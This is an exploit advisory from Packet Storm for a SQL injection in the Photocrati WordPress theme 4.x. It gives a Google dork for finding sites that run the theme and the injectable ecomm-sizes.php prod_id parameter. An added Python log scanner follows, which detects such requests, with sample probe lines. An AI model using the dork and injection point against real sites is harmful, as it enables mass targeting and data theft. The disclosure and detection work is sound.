WordPress Photocrati Theme 4.x.x SQL Injection

2015-03-02T00:00:00
ID PACKETSTORM:130595
Type packetstorm
Reporter ayastar
Modified 2015-03-02T00:00:00

Description

                                        
`# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]  
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]  
# Date: [23 / 09 / 2011 ]  
# Exploit Author: [ ayastar ]  
# Email : dmx-ayastar@hotmail.fr  
# Software Link: [ http://www.photocrati.com ]  
# Version: [4.X.X]  
# Tested on: [ windows 7 ]  
  
  
--------  
details |  
=======================================================  
Software : photocrati  
version : 4.X.X  
Risk : High  
remote : yes  
  
An attacker can perform a remote SQL injection through the site URL to obtain sensitive information.  
=======================================================  
Exploit code :  
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]  
  
greetz to all muslims  
:) from morocco   
`
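
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans combined-format access log lines for requests to `ecomm-sizes.php` whose `prod_id` is not a plain integer once URL-decoded. The numeric-ID expectation, the theme directory name and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the advisory; the theme directory name varies per site.
TARGET = re.compile(r"/wp-content/themes/[^/]+/ecomm-sizes\.php(?:/|$)", re.I)
# Combined log format: client, ident, user, [time], "METHOD URI PROTO", status
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')
# Assumption: a legitimate prod_id is a short decimal integer.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_prod_id(uri):
    """Return the decoded prod_id values in `uri` that are not plain integers."""
    parts = urlsplit(uri)
    if not TARGET.search(unquote(parts.path)):
        return []
    # keep_blank_values so an empty prod_id= is reported, not silently dropped
    values = parse_qs(parts.query, keep_blank_values=True).get("prod_id", [])
    return [v for v in values if not NUMERIC_ID.fullmatch(v)]


def scan(lines):
    """Return (client, status, bad_values) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable access-log entry
        client, _method, uri, status = m.groups()
        bad = suspicious_prod_id(uri)
        if bad:
            hits.append((client, int(status), bad))
    return hits


# Constructed sample log lines (documentation IP ranges, hypothetical theme dir).
BASE = "/wp-content/themes/photocrati-theme/ecomm-sizes.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [02/Mar/2015:10:00:01 +0000] "GET {BASE}?prod_id=12 HTTP/1.1" 200 512',
    f'203.0.113.9 - - [02/Mar/2015:10:00:05 +0000] "GET {BASE}?prod_id=12%27 HTTP/1.1" 500 0',
    f'198.51.100.4 - - [02/Mar/2015:10:00:09 +0000] "GET {BASE}?prod_id=12&prod_id=x+y HTTP/1.1" 200 40',
    '198.51.100.4 - - [02/Mar/2015:10:00:11 +0000] "GET /index.php?prod_id=abc HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for client, status, bad in scan(SAMPLE_LOG):
        print(f"{client} status={status} non-numeric prod_id={bad!r}")
```

Access logs record only the query string, so a `prod_id` sent in a request body is not covered by this check.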